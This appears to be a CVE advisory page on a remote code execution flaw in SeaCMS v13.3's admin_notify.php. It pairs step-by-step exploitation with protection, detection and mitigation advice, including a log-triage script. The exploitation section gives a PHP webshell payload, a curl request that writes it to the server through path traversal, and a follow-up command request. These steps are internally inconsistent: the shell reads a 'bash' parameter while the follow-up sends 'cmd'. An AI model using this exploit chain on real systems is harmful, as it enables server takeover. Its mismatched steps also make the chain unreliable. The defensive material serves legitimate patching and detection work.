How CVE-2025-25793 Works
The vulnerability in SeaCMS v13.3 arises from improper input sanitization in admin_notify.php, allowing attackers to inject malicious PHP code via crafted HTTP requests. The file processes admin notifications without proper authentication checks, enabling unauthenticated RCE. Attackers use the resulting file-write primitive to upload a webshell, granting full server control. The flaw stems from an unsafe `file_put_contents()` call whose target path is user-controlled and not protected against path traversal.
DailyCVE Form
Platform: SeaCMS
Version: v13.3
Vulnerability: Remote Code Execution
Severity: Critical
Date: 03/28/2025
What Undercode Say:
Exploitation
1. Payload Crafting:
<?php system($_GET[bash]); ?>
2. Exploit Request:
curl -X POST "http://target/admin_notify.php" -d "path=../../shell.php&content=<?php system(\$_GET[bash]); ?>"
3. Post-Exploit:
curl "http://target/shell.php?cmd=id"
Protection
1. Patch: Upgrade to SeaCMS v13.4+.
2. WAF Rules (nginx location block; the dot is escaped and the path anchored so the regex matches only this file):
location ~ ^/admin_notify\.php$ { deny all; }
3. File Permissions:
chmod 640 admin_notify.php
Detection
1. Log Analysis:
grep "POST /admin_notify.php" /var/log/apache2/access.log
2. YARA Rule:
rule seashell {
    strings:
        $php = "<?php system"
    condition:
        $php
}
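As an added example (not part of the original write-up), the log-analysis step above can be turned into a small triage script that runs over Apache access-log lines and flags the indicators this page describes: POSTs to admin_notify.php, path-traversal sequences in request parameters, and follow-up requests to a PHP file that is not part of the known install. The log lines are constructed samples, and the list of known PHP files is an assumption you would replace with your own inventory.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines in Apache "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [28/Mar/2025:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Mar/2025:10:01:09 +0000] "POST /admin_notify.php HTTP/1.1" 200 311 "-" "curl/8.4.0"
203.0.113.7 - - [28/Mar/2025:10:01:15 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 64 "-" "curl/8.4.0"
198.51.100.2 - - [28/Mar/2025:10:02:00 +0000] "GET /admin_notify.php?path=..%2F..%2Fx.php HTTP/1.1" 403 199 "-" "curl/8.4.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, URL, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# "../" or "..\" after URL-decoding, i.e. a traversal attempt in a parameter.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')

# Assumed inventory of legitimate PHP entry points; replace with your own list.
KNOWN_PHP = frozenset({"/index.php", "/admin_notify.php"})


def triage(log_text, known_php=KNOWN_PHP):
    """Return (ip, reason, url) alerts for the indicators discussed on this page."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than failing the whole scan
        ip, method, url = m["ip"], m["method"], m["url"]
        path = urlsplit(url).path
        if method == "POST" and path == "/admin_notify.php":
            alerts.append((ip, "post_to_admin_notify", url))
        if TRAVERSAL_RE.search(unquote(url)):
            alerts.append((ip, "path_traversal_param", url))
        if path.endswith(".php") and path not in known_php:
            alerts.append((ip, "unknown_php_file_requested", url))
    return alerts


def suspected_webshell_drops(alerts):
    """IPs that both hit admin_notify.php via POST and then requested an unknown .php file."""
    posted = {ip for ip, reason, _ in alerts if reason == "post_to_admin_notify"}
    unknown = {ip for ip, reason, _ in alerts if reason == "unknown_php_file_requested"}
    return posted & unknown
```

Run `triage(open("/var/log/apache2/access.log").read())` against a real log and feed the result to `suspected_webshell_drops()` to surface clients that match the full write-then-execute sequence rather than a single noisy indicator.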
Mitigation
1. Disable Component:
rename("admin_notify.php", "admin_notify.bak");
2. PHP Hardening:
allow_url_include = Off
; system() is included because the webshell shown in this write-up calls it
disable_functions = exec,passthru,shell_exec,system
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25793